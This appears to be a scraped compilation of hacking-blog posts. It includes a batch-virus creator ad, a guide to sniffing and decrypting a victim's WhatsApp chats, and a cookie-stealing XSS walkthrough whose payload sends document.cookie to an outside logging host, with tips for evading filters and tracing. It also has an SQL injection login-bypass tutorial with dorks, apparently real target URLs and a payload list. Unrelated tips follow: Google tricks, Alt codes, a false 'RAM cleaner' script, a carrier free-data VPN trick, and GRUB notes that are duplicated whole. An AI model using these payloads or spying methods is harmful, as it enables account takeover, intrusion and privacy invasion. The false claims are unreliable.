Sonic bat, Bat virus creator, Secugenius.




Sonic Bat.
This program creates batch (.bat) viruses and has varied options to ruin the victim computer in different ways. We can flood the storage space on victims' computer by making large number of files in different folders by using its "folder flood" feature. It also includes bat to exe converter to convert your batch virus files into exe virus programs and an icon changer.

                                       figure 1.1 Sonic Bat.


Download here:

WhatsApp Sniffer, Whats app hacking , SECUGENIUS

 

 

1. WhatsApp Sniffer

WhatsAppSniffer is a tool for root terminals to read WhatsApp conversations of a WIFI network (Open, WEP, WPA/WPA2). It captures the conversations, pictures / videos and coordinates that aresent or received by an Android phone, iPhone or Nokia on the same WIFI network. It has not been tested with W indows Phone terminals. It can’t read the messages written or received by the BlackBerry’s, as they use their own servers and not WhatsApp’s.
This application is designed to demonstrate that the security of WhatsApp’s communications is null. WhatsAppSniffer just use the TCPDump program which reads all the WIFI network packets and filters those which has origin or destination WhatsApp’s servers. All messages are in plain text, so it does not decrypt anything, complying fully with the legal terms of WhatsApp (3.C: “While we do not disallow the use of sniffers Such as Ethereal, tcpdump or HttpWatch in general, Any we do going efforts to disallow reverse-engineer our system, our protocols, or explore outside the boundaries of the ordinary requests made by clients WhatsApp …. “)
For WPA/WPA2 encrypted networks, if uses the tool ARPSpoof (optional)

 Requirements

  1. Rooted Android Device.
  2. Your Victim Should Use Same Wi-Fi Through Which you are connected.
  3. WhatsAppSniffer Donate ★ root v1.03.

2. Decrypting Conversations

have your victim locked his whatsapp? or you want all his conversation on your PC. Generally for security reasons WhatsApp encrypt Conversation while taking backup in SD Card or Phone Memory.But i have found a tool on XDA that claims to decrypt all the whatsapp conversation down to your PC.
If you have some access over his device you can also send files from Bluetooth to your device and later read all the conversations.
This tool is called WhatsApp Xtract and for this all credits goes to ztedd
Some general advice on how to backup Whatsapp and get the database file:

Android

- In Whatsapp go to settings – more – Backup Chats
- Copy the folder “Whatsapp” on the SD card to your backup location (e.g., PC)
- (ideally also) use the app Titanium Backup to backup the full whatsapp application together with its data, copy the backup from the folder “TitaniumBackup” on the SD card to your backup location (e.g., PC)
- Use this tool Whatsapp Backup Extractor (download in this thread) to show the chats in a friendly readable format. The necessary files “wa.db” and “msgstore.db” you will find inside the Titanium Backup archive “com.whatsapp-[Date]-[some digits].tar.gz”, alternatively (without Titanium Backup) you can use the msgstore.db.crypt file from the folder Whatsapp/Databases on the SD card.

iPhone

- use Itunes to create an unencrypted Backup
- use an Iphone Backup Tool to get the file net.whatsapp.WhatsApp/Documents/ChatStorage.sqlite, e.g. I-Twin or Iphone Backup Extractor. Make sure to create an unencrypted backup with Itunes, as these tools can’t handle encrypted backups. Another possibility are forensic tools like UFED Physical Analyzer.)

Blackberry

- sync your blackberry with desktop manager and then copy the messagestore.db file from SD
- however, it seems that this file is encrypted? Currently we don’t know how to get the unencrypted messagestore.db file
- Blackberry not supported yet!

Nokia

 - not known yet
- Nokia not supported yet!
For Further Detail about this Method you can move to this Forum of XDA.

3. Using Spywares

Using 3rd Party Spywares can be very useful for spying not only WhatsApp Conversation but also many things like, you can able to Track GPS Location, you can capture the lock screen passwords and they can be also used for monitoring Websites. there are many spywares in the market but i recommend is BOSSPY. Because it’s free

Cookie Stealing Via XSS SECUGENIUS

In this tutorial I’ll try to explain the procedure of cookie stealing through XSS in a few simple steps. This way you can apply it to any site you want, but I’ll stick to http://www.example.com/ for this walkthrough.
Step one: Finding a XSS vulnerability
I assume everyone who wants to learn cookie stealing through XSS already knows how to find XSS vulnerabilities, so I won’t explain this in detail here.
For this walkthrough we’ll stick with a simple GET variable XSS, just to make it easier. If you understand this and have some basic knowledge about the POST method, you’ll be able to make autosubmitting pages for POST XSS vulnerabilities yourself.
Here’s our PoC XSS vulnerability:
http://www.example.com/search.php?query="><script>alert(123)</script>
When this page is loaded, a popup message saying “123″ should be displayed. This means we have our vulnerability.
Step two: Setting up a cookie stealer
If we want to steal cookies, we’ll need for example a PHP page which stores them for us. A simple cookie stealer can look like this:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookie . "\n\n");
fclose($file);
?>
However there are other ways to log the cookie as well. In my opinion, the best and most secure way is to use WhiteAcid’s Community Cookie Logger (CCL) which can be found at http://ccl.whitea. . .
If you use your own server or host account for cookie stealing, it’s easy for others to track you down. Therefore we’ll use CCL in this walkthrough. Registering at CCL gives you an anonymous account with a random ID number instead of a username. For this tutorial I just use a fake account with the ID 123456.
So now, we just check the CCL service by executing a test string. We go to
http://ccl.whitea. . .st_for_XSS.
We MUST include our ID number in the test URL, otherwise it won’t show up in our logs. Then we login to CCL and see the new entry with our IP, referer, user agent and of course the data “test_for_XSS”. The cookie logger works fine.
Step three: Logging a cookie
So we have a XSS vulnerability and we have a cookie logger. Now we just have to connect them to each other.
We make a new injection (instead of that alert thing) which sends the cookie data. It could look like this:
http://www.example.com/search.php?query="><script>location.href = 'http://ccl.whiteacid.org/log.php?123456'+document.cookie;</script>
If the site doesn’t use addslashes() or any other filters that mess up our injection, we have successfully captured the cookie and saved it in our CCL account! From here, we can copy the users’ cookies (most commonly the sessions) to our own cookies and get into their accounts…
Step four: Filter evasion
Let’s say we encountered the following common problem: the target page uses addslashes() on the GET variable before printing it, which kills our injection by destroying our quotes. No problem, we just have to do it another way then 
We register a new account on a free hosting site (I’ll use the FreeWebs.com account Uber0n for this walkthrough) and make a new script file there. I make a file called cookiesteal.js and give it the following content:
location.href = 'http://ccl.whiteacid.org/log.php?123456'+document.cookie;
Now we call the script through the XSS vulnerable page:
Login to CCL once again and you’ll see the new entry! However, remember NOT to register the account on the hosting site with your normal nickname and make sure you register using a good proxy so that you can’t be tracked. You can also ask XSSed.com to host your script files.

Some Cool Google Tricks !!!! SECUGENIUS

Some Cool Google Tricks !!!! As we all know that Google is the world’s leading search engine and also full of entertainment.
Today I’m telling about 10 funny Google tricks,
1. Recursion
Type ‘recursion’ in Google search and check out the suggestion query.
2. Google Tilt & Askew
Type ‘tilt’ or ‘askew’ in Google search, you will see Google search window to be tilted to the right side.
3. Google Axis
Type ‘google axis’ in Google search and click on the first link.
4. Google Sink
http://www.google.com.hk/intl/zh-CN/landing/shuixia/
5. PAC-MAN
Type ‘pacman’ in Google search and click on the first link
6. Ninja
Go to Google Reader, then press arrows keys ‘up, up, down, down, left, right, left, right,’ followed by alphabets ‘b, a’. A ninja will pop-up with a search box.
7. Dancing Google Logo http://www.googleloco.com/
8. Google Calculator
Write something like 4+2 & hit Enter, Google will display the result.
9. Feel The Gravity
http://mrdoob.com/projects/chromeexperiments/google_gravity/
10. All Google Logos
http://www.google.com/logos/
ENJOY GOOGLE AT ITS BEST

SQL INJECTION WEBSITE HACKING, Secugenuis

Today, i bring to you another hackin trick/method with SQL INJECTION..
What do we understand by sql injection?
A injecting sql queries into another database or using queries to get authentication bypass as an admin.
Part 1
Basic sql injection Gaining authentication bypass on an admin account. Most sites vulnerable to this are .asp, So first we need 2 find a site, start by opening Google.Now we type our dork: “definition of dork” ‘a search entry for a certain type of site/exploit”
There is a large number of google dork for basic sql injection.

Here are the best:
“inurl:admin.asp”

“inurl:login/admin.asp”

“inurl:admin/login.asp”

“inurl:adminlogin.asp”

“inurl:adminhome.asp”

“inurl:admin_login.asp”

“inurl:administratorlogin.asp”

“inurl:login/administrator.asp”

“inurl:administrator_login.asp”
Example are listed below, make sure the url looks like this
http://www.casualtyprotection.com/login-admin.asp
http://login.fanhow.com/login-admin.asp
http://www.normatech.it/login-admin.asp
Now what to do once we get to our site. the site should look something like this :
Welcome to xxxxxxxxxx administrator panel


Username :

Password :

So what we do here is in the USERNAME, we always type “Admin” as the username and for our PASSWORD we type our sql injection.
Here is a list of sql injections..
‘ or ’1′=’1

‘ or ‘x’=’x

‘ or 0=0 –

or 0=0 –

‘ or 0=0 #

” or 0=0 #

or 0=0 #

‘ or ‘x’=’x

” or “x”=”x

‘) or (‘x’=’x

‘ or 1=1–

” or 1=1–

or 1=1–

‘ or a=a–

” or “a”=”a

‘) or (‘a’=’a

“) or (“a”=”a

hi” or “a”=”a

hi” or 1=1 –

hi’ or 1=1 –

‘or’1=1′
TYPE ANY ONE OF THESE IN PASSWORD SPACE… There are many more but these are the best ones that i know.
what this sql injection is doing :

Confusing the database till it gives you authentication bypass. So your input should look like this


username: Admin

password: ’or’1′=’1

So click submit and you’re in. . Wow.
NOTE not all sites are vulnerable.
HOW TO SECURE YOUR SITE FROM THIS ATTACK
1- Put encryption on the passwords.
2- Change the platform of your website from asp to php.
Disclaimer

:::am using this as a tutorial for educative aspect and not for crime. . . So be careful.

HOW TO MAKE SYMBOLS WITH KEYBOARD SECUGENIUS

HOW TO MAKE SYMBOLS WITH KEYBOARD

Hey Brainny Pals. . Its cool to share with you this trick of making cute Icons, Symbols, Smiley.
We might have been looking for this article, but i will let you know that all what you want is here. . . . Now we can chat, update status, or input this icons in our texts on blogs, wapsites, or website e.t.c.

Now, listed below are the keyboard shortcut keys Via the power of the ALT key.
Hold on ALT and type the Numbers.

Alt + 0153 as ™ = Trademark symbol
Alt + 0169 as © = Copyright symbol
Alt + 0174 as ® = Registered trademark symbol
Alt + 0176 as ° = Degree symbol
Alt + 0177 as ± = Plus-or – minus sign
Alt + 0182 as ¶ = Paragraph mark
Alt + 0190 as ¾ = Fraction, three-fourths
Alt + 0215 as × = Multiplication sign
Alt + 0162 as ¢ = The cent sign
Alt + 0161 as ¡ = Upside down exclamation point
Alt + 0191 as ¿ = Upside down question mark
Alt + 1 as ☺ = Smiley face
Alt + 2 as ☻ = Black smiley face
Alt + 15 as ☼ = Sun
Alt + 12 as ♀ = Female sign
Alt + 11 as ♂ = Male sign
Alt + 6 as ♠ = Spade
Alt + 5 as ♣ = Club
Alt + 3 as ♥ = Heart
Alt + 4 as ♦ = Diamond
Alt + 13 as ♪ = Eighth note
Alt + 14 as ♫ = Beamed eighth note
Alt + 8721 as ∑ = N-ary summation (auto sum)
Alt + 251 as √ = Square root check mark
Alt + 8236 as ∞ = Infinity
Alt + 24 as ↑ = Up arrow
Alt + 25 as ↓ = Down arrow
Alt + 26 as → = Right arrow
Alt + 27 as ← = Left arrow
Alt + 18 as ↕ = Up/down arrow
Alt + 29 as ↔ = Lef t right arrow
ENJOY AND SHARE. . .

Advance Matrix Trick Secugenius

Advance Matrix Trick


1-Open Noteapad and copy below code into it.
@echo off
color 0A
:A
echo b r E w e 4 e T r 8 M e F r a c h a S t 3 D a C r a s p e s T e 4 h 2 w r e G 2
ping -w .9 >nul
echo R E 9 8 8 R a t r e g 6 n u m A b R E X e Y A T u C 7 a D R a c r u C e B E p e
ping -w .9 >nul
echo c E B E s A d R u B R 3 H e R u D 7 g u d U 7 T a b u T 5 e p E 2 a v e 6 8 a Z
ping -w .9 >nul
echo n u r A X a j a s t a 9 h a 6 e h e G a s u t r a t r A y a f E q u 8 u b R u d
ping -w .9 >nul
echo k u v e 4 E 6 3 e t r a d r e f e y e q e 6 U H e z U b r u R a s 2 4 3 r A N a
ping -w .9 >nul
echo v u P R a b R u c e d U s w a h a c r a t h U 7 r a h u t u h u V e 7 U k u S a
ping -w .9 >nul
echo T e D r e 8 A p r a d a b u f U c u c E h E t 7 c r 5 s P a f r e t h u t 9 u t
ping -w .9 >nul
echo b R u G e p a R e s a P H e P a 2 U d 4 P r e F A b a t h a t h U s w a d R U d
ping -w .9 >nul
echo v U Y a C R e T R 9 k u b e D r a T 6 u j e 5 2 4 e B a f 2 u b 5 w A p a y U Y
ping -w .9 >nul
echo b r E w e 4 e n r 8 M e F r a c h a S t 3 D a C r a s p e s T e 4 a 2 w r e G 2
ping -w .9 >nul
echo k u v e 4 E 6 3 e t r a d r e f e y e q e 6 U H e z U b r u R a s 2 4 3 r A N a
ping -w .9 >nul
echo v u P R a b s u c e d U s w a 3 a c r a t h U 7 r a k u t u h u V e 7 U k u S a
ping -w .9 >nul
echo n u r A X a j a s t a 9 h a 6 e h e G a s u t r a t r A y a f E q u 8 u b u u d
ping -w .9 >nul
goto A

2. Save as .bat file and run.

Clean Your RAM Using Notepad, Secugenius

Clean Your RAM Using Notepad


Steps to Clean Your RAM Using Notepad:

Step 1: Open Notepad
Step 2: Type FreeMem=Space(10240000000)

Step 3: Save it as “CLEANER.VBS” in any location you like.
 

Step 4: You can edit the code and write 512 instead of 1024if you own a 512mb RAM or change to anything you like.
Step 5: Run it !


After this final step your RAM will be free.

AIRTEL 3G VPN NEW WORKING CONFIG. secugenius



AIRTEL 3G VPN NEW WORKING CONFIG.

 AirTel 3G Tcp 443 Vpn Trick Configs.
This is working only in those states Where Tcp 443 Is open .
Working Confirmed at Delhi NCR.Other states users can
Check for their states


Features:
1.Use in 0 Balance (No Need of BBM plan Or any)
2.No Disconnection Problem is there .
3.Based on Fastest Tcp 443 Protocol.
4.No speed capping.

5.No sim blocking.
6.Works on blocked sim also.
7.No Registration Required.
8.APN- airtelgprs.com.


Steps For Airtel 3G Zero Balance VPN Trick:
1.Download The Attachment.
2.Install Nmdvpn and Put configs Here (C:\Program Files\NMDVPN\config).
3.Windows 7 and Windows 8 Users RUN NMD VPN as the Administrator.
4.Just Connect and Enjoy.

 to download the config file.

http://www.mediafire.com/download/unkid6iwf2164nk/config.rar

GRUB GRUB INSTALL AND GRUB PROBLEMS WITH GRUB FILE



                 
GRUB /GRUB INSTALL/ AND GRUB PROBLEMS WITH GRUB FILE


GRUB:- GRUB IS THE BOOTLOADER FOR THE LINUX. AND IF THERE IS ANY PROBLEM IN
               THE GRUB FILE THE SYSTEM WILL NOT LOGIN EVEN NOT BOOT.
           

PROBLEM 1_______ IF WHOLE GRUB BOOTLOADER`S CONFIGURATION FILES ARE DELETED

            WE HAVE TO INSTALL THE GRUB
           
            Boot pc from the RHEL5 DVD THEN PRESS ANY KEY
                       

            LINUX RESCUE _________enter to enter in the linux rescue mode
           
            After reaching at the shell mode
           
            Sh-3.1# grub-install /dev/sda ____________ at last is the hdd address
                                                            This is the command to install the grub boot loader

            Check for login

            Sh-3.1# login
            Passwd *******


            Login successfully

_____________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________
















                     GRUB.CONF FILE____________________
1…

The grub file has its most important configuration that is as FOR SINGLE OPERATING SYSTEM

Default=0__________________it is the priority no of o/s to boot first by default {0} for Linux if put{1} then xp boot.
Timeout=5 _________________seconds for the wait to system boot on which o/s

Title REDHAT Enterprises Linux -2.6.18-53.el5 __________ title  for the o/s
            Root (hd0,0) __________________________________address of partition on which boot loader install.
            Kernel  /vmlinuz-2.6.18-53.el5 ro root=/dev/sda2 ___ kernel and the partition address on which kernel install.
            Initrd /initrd-2.6.18-53.el5.img________________address of the ram , data stored in it in compressed form.

THIS IS THE MOST IMPORTANT FILE TO REMEMBER FOR RHCE…………………………………………..

2…

The grub file has its most important configuration that is as FOR DUAL BOOT OPERATING SYSTEM

Default=0__________________it is the priority no of o/s to boot first by default {0} for Linux if put{1} then xp boot.
Timeout=5 _________________seconds for the wait to system boot on which o/s

Title REDHAT Enterprises Linux -2.6.18-53.el5 __________ title  for the o/s
            Root (hd0,3) __________________________________address of partition on which boot loader install.
            Kernel  /vmlinuz-2.6.18-53.el5 ro root=/dev/sda5 ___ kernel and the partition address on which kernel install.
            Initrd /initrd-2.6.18-53.el5.img________________address of the ram , data stored in it in compressed form.

Title other
                        Rootnoverify (hd0,0)________________-because we first install the other o/s so it gets the first addres.
                        Chainloader+1
#

Because we install the other o/s before the LINUX it takes the hdd address after the partitions of the first installed O/S

BUT THE BOOT LOADER OF THE LINUX IS INSTALLED IN THE LAST PARTITION OF THE OTHER O/S SO IF YOU DELETE THE LAST PARTITION OF THE OTHER O/S THE BOOT LOASDER GRUB  IS AUTOMATICALLY DELETED THEN YOU HAVE TO
REINSTALL THE GRUB BY { grub-install /dev/sda} comnd

1__ PROBLEM __ IF GRUB.CONF IS DELETED FROM
                                                                                    /BOOT/GRUB/GRUB.CONF

THEN BOOT THE SYSTEM IT WILL STOP ON THE GRUB


            Grub >  find /grub/stage1 ___________ to find the address of partition with which /boot and / are related
                                                                                    Or in which the boot loader configuration is stored .


                 
GRUB /GRUB INSTALL/ AND GRUB PROBLEMS WITH GRUB FILE


GRUB:- GRUB IS THE BOOTLOADER FOR THE LINUX. AND IF THERE IS ANY PROBLEM IN
               THE GRUB FILE THE SYSTEM WILL NOT LOGIN EVEN NOT BOOT.
           

PROBLEM 1_______ IF WHOLE GRUB BOOTLOADER`S CONFIGURATION FILES ARE DELETED

            WE HAVE TO INSTALL THE GRUB
           
            Boot pc from the RHEL5 DVD THEN PRESS ANY KEY
                       

            LINUX RESCUE _________enter to enter in the linux rescue mode
           
            After reaching at the shell mode
           
            Sh-3.1# grub-install /dev/sda ____________ at last is the hdd address
                                                            This is the command to install the grub boot loader

            Check for login

            Sh-3.1# login
            Passwd *******


            Login successfully

_____________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________
















                     GRUB.CONF FILE____________________
1…

The grub file has its most important configuration that is as FOR SINGLE OPERATING SYSTEM

Default=0__________________it is the priority no of o/s to boot first by default {0} for Linux if put{1} then xp boot.
Timeout=5 _________________seconds for the wait to system boot on which o/s

Title REDHAT Enterprises Linux -2.6.18-53.el5 __________ title  for the o/s
            Root (hd0,0) __________________________________address of partition on which boot loader install.
            Kernel  /vmlinuz-2.6.18-53.el5 ro root=/dev/sda2 ___ kernel and the partition address on which kernel install.
            Initrd /initrd-2.6.18-53.el5.img________________address of the ram , data stored in it in compressed form.

THIS IS THE MOST IMPORTANT FILE TO REMEMBER FOR RHCE…………………………………………..

2…

The grub file has its most important configuration that is as FOR DUAL BOOT OPERATING SYSTEM

Default=0__________________it is the priority no of o/s to boot first by default {0} for Linux if put{1} then xp boot.
Timeout=5 _________________seconds for the wait to system boot on which o/s

Title REDHAT Enterprises Linux -2.6.18-53.el5 __________ title  for the o/s
            Root (hd0,3) __________________________________address of partition on which boot loader install.
            Kernel  /vmlinuz-2.6.18-53.el5 ro root=/dev/sda5 ___ kernel and the partition address on which kernel install.
            Initrd /initrd-2.6.18-53.el5.img________________address of the ram , data stored in it in compressed form.

Title other
                        Rootnoverify (hd0,0)________________-because we first install the other o/s so it gets the first addres.
                        Chainloader+1
#

Because we install the other o/s before the LINUX it takes the hdd address after the partitions of the first installed O/S

BUT THE BOOT LOADER OF THE LINUX IS INSTALLED IN THE LAST PARTITION OF THE OTHER O/S SO IF YOU DELETE THE LAST PARTITION OF THE OTHER O/S THE BOOT LOASDER GRUB  IS AUTOMATICALLY DELETED THEN YOU HAVE TO
REINSTALL THE GRUB BY { grub-install /dev/sda} comnd

1__ PROBLEM __ IF GRUB.CONF IS DELETED FROM
                                                                                    /BOOT/GRUB/GRUB.CONF

THEN BOOT THE SYSTEM IT WILL STOP ON THE GRUB


            Grub >  find /grub/stage1 ___________ to find the address of partition with which /boot and / are related
                                                                                    Or in which the boot loader configuration is stored .